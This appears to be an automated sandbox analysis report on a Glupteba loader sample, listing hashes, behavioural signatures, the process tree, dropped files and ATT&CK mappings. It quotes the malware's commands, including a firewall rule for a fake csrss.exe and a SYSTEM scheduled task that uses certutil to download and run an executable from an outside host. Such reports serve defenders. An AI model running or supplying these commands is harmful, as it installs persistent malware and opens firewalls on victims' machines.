glupteba | 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410

General

Target

59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
Size

3.8MB
MD5

be737bbd92519d634ee9f64ec3b921a9
SHA1

2f774c2aa118105f6c01a612323a36b130703616
SHA256

59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410
SHA512

41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmp	family_glupteba
behavioral1/memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmp	family_glupteba

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1440 bcdedit.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab makecab.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1812 schtasks.exe
1744 schtasks.exe

pid	process
1440	bcdedit.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab	makecab.exe

pid	process
1812	schtasks.exe
1744	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

pid	process
1940	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
1704	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

description	pid	process
Token: SeDebugPrivilege	1940	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
Token: SeImpersonatePrivilege	1940	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.execmd.exe

description	pid	process	target process
PID 1704 wrote to memory of 1064	1704	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe	cmd.exe
PID 1704 wrote to memory of 1064	1704	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe	cmd.exe
PID 1704 wrote to memory of 1064	1704	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe	cmd.exe
PID 1704 wrote to memory of 1064	1704	59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe	cmd.exe
PID 1064 wrote to memory of 1692	1064	cmd.exe	netsh.exe
PID 1064 wrote to memory of 1692	1064	cmd.exe	netsh.exe
PID 1064 wrote to memory of 1692	1064	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
"C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
"C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1952

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1812

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1744

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:952

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1440

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525000917.log C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab
1⤵
- Drops file in Windows directory
PID:888

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies data under HKEY_USERS
PID:1692

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
C:\Windows\rss\csrss.exe
Filesize
893KB

MD5
4523032c8d2caeef06178f3854637376

SHA1
28686ee0e0d6776f19326a1222a68543437c1e26

SHA256
515d77a416a7cb61ad0125458646ccedd2de49875da1728bb2b2c46919d617ca

SHA512
0c85115ced443a096f2ea62025286d4f01dce874ffec58c22ea27b9ebb8ae44083742abbff6e4eb1609c9bf41c05426f5daf4e430c71ebfb1afed644277840d0

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll

Download Submit
\Windows\rss\csrss.exe
Filesize
1.6MB

MD5
58a807deff122b95edeb0586095141f0

SHA1
627fc9ac5f2ad5e81bd7d292e568f287014b2fde

SHA256
c74751e268b059e9341684f5e7f097afa316c04c17d6a2ce7825a19db2598fd3

SHA512
308183fbe8046fe66be115a8d2ea2b3f4dccd9624f913dba0499b5f81af9d398c2fb7dd1f99c3b6697da563715f7554ef4d9101c17dd3c50f23142f02efe5229

Download Submit
\Windows\rss\csrss.exe
Filesize
2.4MB

MD5
dc741515f1b67996d40ce6438019ba1d

SHA1
bdf78779d6d70dfad0dcb8644ca6b049d53453ce

SHA256
6c8ff236640f859eac5497e8f0f563dbe79dc3f595199027feae2913302d0d2c

SHA512
dd9eb39fd211d305adf0da12c73511399edd04db8628b0f204ec745db39ca8c4c2b121574978db7ff3df4d835921961f032b6507efe6773c30a0e819d884fbcc

Download Submit
memory/1064-59-0x0000000000000000-mapping.dmp

Download
memory/1440-83-0x0000000000000000-mapping.dmp

Download
memory/1692-61-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmp

Filesize
8KB

Download
memory/1692-60-0x0000000000000000-mapping.dmp

Download
memory/1704-63-0x0000000000400000-0x0000000000FE5000-memory.dmp

Filesize
11.9MB

Download
memory/1704-62-0x00000000012C0000-0x0000000001666000-memory.dmp

Filesize
3.6MB

Download
memory/1704-58-0x00000000012C0000-0x0000000001666000-memory.dmp

Filesize
3.6MB

Download
memory/1940-54-0x0000000001250000-0x00000000015F6000-memory.dmp

Filesize
3.6MB

Download
memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmp

Filesize
11.9MB

Download
memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmp

Filesize
7.0MB

Download
memory/1940-55-0x0000000001250000-0x00000000015F6000-memory.dmp

Filesize
3.6MB

Download
memory/1952-70-0x0000000000400000-0x0000000000FE5000-memory.dmp

Filesize
11.9MB

Download
memory/1952-69-0x00000000011B0000-0x0000000001556000-memory.dmp

Filesize
3.6MB

Download
memory/1952-68-0x00000000011B0000-0x0000000001556000-memory.dmp

Filesize
3.6MB

Download
memory/1952-66-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads